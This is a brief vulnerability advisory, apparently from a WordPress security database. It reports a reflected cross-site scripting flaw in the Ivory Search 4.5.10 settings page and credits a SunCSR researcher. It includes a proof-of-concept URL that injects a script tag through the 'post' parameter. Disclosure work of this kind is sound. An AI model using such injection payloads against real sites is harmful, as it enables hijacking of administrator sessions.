The setting page of Ivory Search 4.5.10 is vulnerable to reflected XSS when a logged in administrator visit a malicious link or page, as it does not sanitise or escape the GET post parameter before outputting it in a tag attribute
As an admin user, open: https://example.com/wp-admin/admin.php?page=ivory-search-new&tab=customize&post=a\"><script>alert(/XSS/)<%2Fscript> Video: https://mega.nz/file/3tVzzYgA#M6LIoYcnNJbMX6UU19mU7QKCLdNp7Ur0PPsrY8Mj3z0
Nguyen Anh Tien - SunCSR (Sun* Cyber Security Research)
Nguyen Anh Tien
Yes
2021-02-01 (about 2 years ago)
2021-02-01 (about 2 years ago)
2021-02-01 (about 2 years ago)